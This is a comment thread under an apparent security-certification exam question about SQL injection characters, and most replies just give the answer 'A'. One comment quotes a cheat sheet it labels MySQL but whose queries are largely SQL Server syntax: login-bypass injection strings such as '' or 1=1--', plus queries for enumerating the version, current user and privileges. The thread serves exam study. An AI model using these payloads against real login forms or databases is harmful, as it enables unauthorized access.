7 Comments on “Which of the following is not the SQL injection attack character?”

1. rohit says:

   March 21, 2015 at 11:30 am

   D

2. Alie says:

   March 31, 2015 at 1:35 pm

   “A” Ecsa v8 page 606 SQL injection attack characters

3. Naveen Kumar says:

   May 6, 2015 at 5:06 pm

   A

4. FP says:

   May 26, 2015 at 6:48 pm

   A is the only one NOT on page 606…

5. Khaled Gamo says:

   June 27, 2015 at 1:23 pm

   A 100%

6. Q　 says:

   October 4, 2015 at 5:47 am

   A is the correct answer.

   We don’t use $ (dollar sign) to make up the SQL Injection payload.

   The following is derived from “MySQL SQL Injection Cheat Sheet.”

   ======

   Login Notes

   Bypassing Login Screens SQL Injection 101, Login tricks
   admin’ —
   admin’ #
   admin’/*
   ‘ or 1=1–
   ‘ or 1=1#
   ‘ or 1=1/*
   ‘) or ‘1’=’1–
   ‘) or (‘1’=’1–

   ======

   Initial Exploitation

   Version SELECT @@VERSION
   Current User SELECT user_name();
   SELECT system_user;
   SELECT user;
   SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
   Current Database SELECT db_name()

   ======

   Privileges

   IS_MEMBER()
   The function indicates whether the current user is a member of the specified Microsoft Windows group or SQL Server database role.

   IF IS_MEMBER (‘db_owner’) = 1
   PRINT ‘Current user is a member of the db_owner role’

   IS_SRVROLEMEMBER()
   Indicates whether a SQL Server login is a member of the specified fixed server role.

   IF IS_SRVROLEMEMBER (‘sysadmin’) = 1
   print ‘Current user”s login is a member of the sysadmin role’

7. Hello Wolrd says:

   December 3, 2016 at 8:48 am

   ECSAv9 Module 11, page 6
   Answer is A